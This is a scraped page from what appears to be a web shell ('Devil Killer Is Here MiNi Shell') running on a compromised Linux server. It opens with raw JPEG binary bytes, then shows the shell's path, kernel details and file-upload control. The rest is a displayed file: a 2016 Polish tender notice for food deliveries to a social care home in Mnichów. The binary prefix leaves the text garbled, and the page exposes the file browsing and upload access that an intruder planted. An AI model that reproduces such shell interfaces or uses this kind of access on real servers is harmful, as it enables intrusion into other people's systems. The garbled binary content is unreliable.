JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20161128/352964-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.powiatjedrzejow.pl (-jednost.organizacyjne powiatu, -dom pomocy społecznej, -zamów.publiczne, -dostawy) ' target='_blank'>http://www.powiatjedrzejow.pl (-jednost.organizacyjne powiatu, -dom pomocy społecznej, -zamów.publiczne, -dostawy) </a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 352964 - 2016
              z dnia 2016-11-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Jędrzejów: Przedmiotem zamówienia są :
Sukcesywne dostawy w 2017 r. , do Domu Pomocy Społecznej w Mnichowie,
artykułów ogólnospożywczych (tj. artykułów spożywczych, artykułów
mleczarskich, pieczywa, artykułów ciastkarskich i ciast, mięsa i wędlin, artykułów rybnych, jaj kurzych, mrożonek),wraz z dowozem i wniesieniem, w układzie zadaniowym (zadanie Nr.1  Nr.8).  <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Dom Pomocy Społecznej w Mnichowie, krajowy numer identyfikacyjny
              29116843200000, ul.
              Mnichów 
              135,
              28300  
              Jędrzejów, woj.
              świętokrzyskie, państwo
              Polska, tel.
              41 38-73-512, e-mail
              , faks
              41 38-73-512.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: jednostka organizacyjna samorządu terytoralnego /Powiatu Jędrzejowskiego/</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.powiatjedrzejow.pl (-jednost.organizacyjne powiatu, -dom pomocy społecznej, -zamów.publiczne, -dostawy) </div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Dom Pomocy Społecznej w Mnchowie, Mnichów 135, 28-300 Jędrzejów, woj.świętokrzyskie</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przedmiotem zamówienia są :
Sukcesywne dostawy w 2017 r. , do Domu Pomocy Społecznej w Mnichowie,
artykułów ogólnospożywczych (tj. artykułów spożywczych, artykułów
mleczarskich, pieczywa, artykułów ciastkarskich i ciast, mięsa i wędlin, artykułów rybnych, jaj kurzych, mrożonek),wraz z dowozem i wniesieniem, w układzie zadaniowym (zadanie Nr.1  Nr.8).  <br /><b>Numer referencyjny: </b>1/OS/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />8<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia są :
Sukcesywne dostawy w 2017 r. , do Domu Pomocy Społecznej w Mnichowie,
artykułów ogólnospożywczych (tj. artykułów spożywczych, artykułów
mleczarskich, pieczywa, artykułów ciastkarskich i ciast, mięsa i wędlin, artykułów rybnych, jaj kurzych, mrożonek),wraz z dowozem i wniesieniem, w układzie zadaniowym (zadanie Nr.1  Nr.8).
Przedmiot zamówienia dotyczy artykułów ogólnospożywczych, o standardach jakościowych   które Zamawiający odniósł  do  istotnych cech  przedmiotu zamówienia, i jako dane  identyfikacyjne artykułów (asortymentów) dostaw, zamieścił w  formularzach cenowych (załączniki Nr.2-9), dla poszczególnych zadań.
Dokładne nazwy artykułów (asortymentów) przedmiotu zamówienia, ich dane    identyfikacyjne, przewidywane ilości dostaw   Zamawiający określił  w treści  poszczególnych załączników Nr.2  Nr.9  do SIWZ (formularzach cenowych).
Maksymalne ilości artykułów (asortymentów) przedmiotu zamówienia,   
Zamawiający określił działając z należytą starannością w formularzach cenowych (Zał. Nr.2  9 do SIWZ). Zamawiający zastrzega sobie prawo do dostosowania tych ilości do swoich potrzeb (z uwzględnieniem konsekwencji rachunkowych w wynagrodzeniu  umownym   do max. jego wartości wynikającej  z  umowy), bez prawa do roszczeń  z tego tytułu przez Wykonawcę.
 Przedmiot zamówienia podzielony jest na następujące zadania (części) :

a)   zadanie Nr 1  dostawy artykułów spożywczych zgodnie z formularzem cenowym
      stanowiącym  Zał. Nr 2 do SIWZ. Dostawy dotyczą artykułów :
  -   produkty przemiału ziarna (CPV 15610000-7) : kasze, płatki, ryż, mąka pszenna.
  -   skrobia i produkty skrobiowe (CPV 15620000-0) : mąka ziemniaczana.
  -  olej roślinny (CPV 154 11100-3) : olej jadalny uniwersalny.
  -  oliwa z oliwek (CPV 15411110-6) : oliwa z oliwek.
  -  pasztet (CPV 15131310-1) : pasztet drobiowy.
  -  owoce, warzywa i podobne produkty (CPV 15300000-1) : dżemy, powidła, warzywa 
     przetworzone, soki, owoce suszone (śliwki), groch łuskany (połówki), fasola Jaś.
  -  cukier i produkty pokrewne (CPV 15830000-5) : cukier biały, cukier waniliowy, cukier
     puder, miód, syrop cukrowy.
  -  makaron niegotowany (CPV 15851100-9) : makarony.
  -  kawa, herbata i podobne produkty (CPV 15860000-4) : kawa zbożowa, herbata.
  -  przyprawy i przyprawy korzenne (CPV 15870000-7) : sól, cynamon, czosnek
     granulowany, gałka muszkatałowa, zioła prowansalskie (mieszanka), przyprawa 
     warzywna  do potraw, przyprawa do zup i sosów w płynie, kwasek cytrynowy,  ocet, 
     ketchup,majonez, musztarda, pieprz czarny, przyprawy ziołowe.
  -  produkty dietetyczne (CPV 15882000-4) : chrupki kukurydziane bezglutenowe
     (naturalne i smakowe), kaszki ryżowo-owocowe (bezmleczne), kaszki mleczno-ryżowe           
     z owocami, kaszka mleczno-wielozbożowa wieloowocowa, produkty niskobiałkowe PKU.
  -  różne produkty spożywcze i produkty suszone (CPV 15890000-3) : drożdże,
     proszek do pieczenia, aromaty, bułka tarta, barszcz biały, przyprawa do zup, kostki
     rosołowe, grzyby suszone, kisiel, budyń, galaretki.
  -  kakao, czekolada i wyroby cukiernicze (CPV 15840000-8) : kakao, biszkopty, 
     ciastka kruche, paluszki słone (smakowe), cukierki, czekolada, herbatniki  w czekoladzie.
  -  owoce tropikalne (CPV 03222110 -7) : banany, kiwi.
  -  owoce cytrusowe (CPV 03222200  5) : cytryny, mandarynki.
  -  owoce pestkowe (CPV 03222330  5) : nektarynki, arbuzy, winogrona.

     Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 2 (formularzu
     cenowym zadania Nr 1).

b)  zadanie Nr 2  dostawy artykułów mleczarskich zgodnie z formularzem cenowym
     stanowiącym  Zał. Nr 3 do SIWZ. Dostawy dotyczą artykułów :
  -  śmietana  (CPV 15512000-0) : śmietany 18%,
  -  mleko w proszku (CPV 15511700-0) : mleko w proszku,
  -  masło (CPV 15530000-2) : masła świeżego,
  -  margaryna  (CPV 15431100-9) : margaryny do smarowania, mixu tłuszczowego,
  -  jogurt bez dodatków substancji smakowych  (CPV 15551310-1) : jogurtów
     naturalnych,
  -  jogurt z dodatkiem substancji smakowych (CPV 15551320-4) : jogurtów owocowych,
     deserów,
  -  klasyfikowane produkty mleczarskie (CPV  15550000-8) : kefiru,
  -  maślanka  (CPV  15551500-0) : maślanki,
  -  pasty serowe do smarowania  (CPV 15545000-0) : serków homogenizowanych
     waniliowych, serka wiejskiego i serów topionych,
  -  ser  twardy (CPV 15544000-3) : sera twardego gouda i edamskiego,
  -  ser twarogowy  (CPV 15542100-0) : twarogu półtłustego.  
                                                                        
     Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 3 (formularzu 
     cenowym zadania Nr 2).

c)  zadanie Nr 3  dostawy pieczywa zgodnie z formularzem cenowym stanowiącym  
     Zał. Nr 4 do SIWZ.  Dostawy dotyczą  artykułów :
  -  chleb  (CPV 15811100-7) : chleba zwykłego, chleba graham, chleba słonecznikowego,  
  -  bułeczki (CPV 15811400-0) : bułeczki pszenne, bułeczki graham.     
 
     Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 4 (formularzu
     cenowym zadania Nr 3).

d) zadanie Nr 4  dostawy artykułów ciastkarskich i ciast  zgodnie z formularzem  
    cenowym
    stanowiącym  Zał. Nr 5 do SIWZ. Dostawy dotyczą artykułów :
  - wyroby ciastkarskie  (CPV 15812100-4) :  pączków,
  - ciasta (CPV 15812200-5) : ciast drożdżowych z makiem, ciast drożdżowych z serem, 
    strucli makowej, babki piaskowej, piernika z powidłami.

    Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 5 (formularzu
    cenowym zadania Nr 4).

e) zadanie Nr 5  dostawy mięsa i wędlin zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 6 do SIWZ. Dostawy dotyczą artykułów :
  - drób (CPV 15112000-6) : kurczaka świeżego, filetów świeżych z kurczaka, korpusów
    mrożonych z kurczaka, udek świeżych z kurczaka,świeżego mięsa gulaszowego 
    z kurczaka
  - podroby  (CPV 15114000-0) : świeżych wątróbek i żołądków z kurczaka,
  - wieprzowina (CPV 15113000-3) : świeżej słoniny, świeżej łopatki wieprzowej bez kości, 
    świeżego schabu bez kości, świeżej karkówki bez kości ,
  - mięso wołowe  (CPV 15111000-9) :  świeżej łopatki  wołowej bez kości,
  - wędliny drobiowe (CPV 15131135-0) : pasztetu drobiowego, parówki drobiowej 
    (cienkiej), batonu drobiowego, polędwicy drobiowej, baleronu z indyka,
  - produkty wieprzowe (CPV 15131400-9) : kiełbasy : krakowskiej, szynkowej,
    toruńskiej, wiejskiej, zwyczajnej, pieczeni rzymskiej, pieczeni tyrolskiej, szynki wiejskiej, 
    kaszani, kiszki pasztetowej, salcesonu wiejskiego, boczku wędzonego.

    Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 6 (formularzu
    cenowym zadania Nr 5).
 
f) zadanie Nr 6  dostawy artykułów rybnych zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 7 do SIWZ. Dostawy dotyczą artykułów :
  - ryby przetworzone i konserwowane  (CPV 15200000-0) : filetów, płatów mrożonych 
    z : morszczuka, mintaja,  makreli wędzonej, śledzi solonych Matjas (filety), śledzi w oleju
    (filety), konserw rybnych : paprykarz szczeciński, śledź w pomidorach, filet z makreli 
    w oleju, filet z makreli w pomidorach.

    Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 7 (formularzu
    cenowym zadania Nr 6).

g) zadanie Nr 7  dostawy  jaj  zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 8 do SIWZ. Dostawy dotyczą artykułów :
  - jaja (CPV  03142500-3) : jaj kurzych.

    Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 8 (formularzu
    cenowym zadania Nr 7).

h) zadanie Nr 8  dostawy mrożonek zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 9 do SIWZ. Dostawy dotyczą artykułów :
  - warzywa mrożone (CPV 15331100-8) : mieszanki warzywnej, marchwi kostka, marchwi 
    z groszkiem, kalafiora, fasolki szparagowej,
  - owoce przetworzone (CPV 15332100-5) : mieszanki kompotowej mrożonej, truskawek  
    mrożonych.
    Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 9 (formularzu
    cenowym zadania Nr 8). <br /><br /><b>II.5) Główny kod CPV: </b>15000000-8<br /><b> Dodatkowe kody CPV:</b>15610000-7,
                15620000-0,
                15411100-3,
                15411110-6,
                15512000-0,
                15511700-0,
                15530000-2,
                15431100-9,
                15811100-7,
                15811400-0,
                15812100-4,
                15812200-5,
                15112000-6,
                15114000-0,
                15113000-3,
                15111000-9,
                15200000-0,
                03142500-3,
                15331100-8,
                15332100-5,
                <br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">odpisu z właściwego rejestru lub z centralnej ewidencji i informacji 
      o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
      rejestru lub ewidencji, w celu potwierdzenia braku podstaw  wykluczenia  na   
      podstawie  art. 24 ust.5 pkt 1, w zw. z art.25 ustawy Pzp,
      Wskazany Wykonawca (którego oferta została najwyżej oceniona), składa na  
      wezwanie Zamawiającego w/w dokument (aktualny na dzień złożenia oświadczeń lub   
      dokumentów) , w terminie wyznaczonym przez Zamawiającego (nie  krótszym niż         
      5 dni od daty otrzymania wezwania), oraz (o ile dotyczy w/w Wykonawcy) :
  -    gdy wskazany w/w Wykonawca, polega na zdolnościach lub sytuacji innych  podmiotów na
       zasadach określonych w art. 22a ustawy Pzp, w/w dokument w/w Wykonawca składa również               
       w odniesieniu do podmiotu udostępniającego zasoby.
 -     gdy  wskazany w/w Wykonawca, zamierza powierzyć podwykonawcy wykonanie części
       przedmiotu zamówienia, a który to podwykonawca nie jest podmiotem na którego zdolnościach  
        lub sytuacji w/w Wykonawca polega na zasadach określonych w art. 22a ustawy Pzp, w/w 
       dokument w/w Wykonawca składa również w odniesieniu do podwykonawcy.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Wypełniony formularz oferty - w/g wzoru określonego w Załączniku Nr 1 do SIWZ. 
     
2.Wypełniony (wypełnione) i wyliczone (wyliczony) we wszystkich wierszach
           i kolumnach formularz (formularze) cenowy (cenowe)  wg wzoru (wzorów) 
           określonego (określonych) w Załączniku (Załącznikach) Nr 2-9 do SIWZ.
        

          Uwaga : Wykonawca składa tylko formularze cenowe zadań na które składa ofertę.


3.Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia
          publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 
          zamówienia publicznego w przypadku, gdy wykonawcę reprezentuje
          pełnomocnik. 

        
 
4.Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia
         publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie
         zamówienia publicznego, wykonawców występujących wspólnie. 

         

        (Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców     
         ubiegających się wspólnie o udzielenia zamówienia. Podpisy muszą być złożone przez    
         osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze 
         lub ewidencji Wykonawców ).
5.W celu wykazania braku podstaw do wykluczenia Wykonawcy w okolicznościach        
           o których mowa w art. 24 ust.1 pkt. 23 ustawy Pzp, Wykonawca w terminie 3 dni    
           od dnia przekazania informacji o ofertach złożonych (o której mowa w art. 86 ust.5 
           ustawy Pzp), zamieszczonej na stronie internetowej na której opublikowano SIWZ, 
           przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności 
           do tej samej grupy kapitałowej. W przypadku przynależności do tej  samej grupy 
           kapitałowej, Wykonawca może przekazać dowody że powiązania z  innym 
           wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. 
6.oświadczenie Wykonawcy/ów o spełnianiu warunków udziału w postępowaniu -   
           w/g wzoru określonego w  Załączniku Nr 10 do SIWZ,
